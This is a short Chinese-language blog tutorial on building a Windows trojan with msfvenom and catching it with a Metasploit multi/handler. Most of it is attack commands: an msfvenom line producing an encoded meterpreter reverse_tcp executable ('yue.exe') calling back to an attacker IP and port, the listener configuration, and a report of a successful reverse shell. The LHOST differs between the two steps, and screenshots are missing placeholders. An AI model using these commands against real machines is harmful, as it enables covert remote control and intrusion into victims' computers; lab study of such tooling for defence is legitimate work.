一:利用msfconsole生成windows木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444  -e x86/33 -f exe -o yue.exe

参数说明:

  • -p:指定生成的类型
  • lhost:攻击者的ip地址
  • lport:攻击者的端口
  • -e:木马的编码方式
  • -f:生成的文件格式
  • -o:输出文件

请输入图片描述

二:利用msfconsole攻击

配置参数:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.129
set LPORT 4444
exploit

请输入图片描述

三:windows运行木马

请输入图片描述
成功得到反弹
具体攻击细节,我们将会在第二节演示!

最后修改:2023 年 08 月 04 日
如果觉得我的文章对你有用,请随意赞赏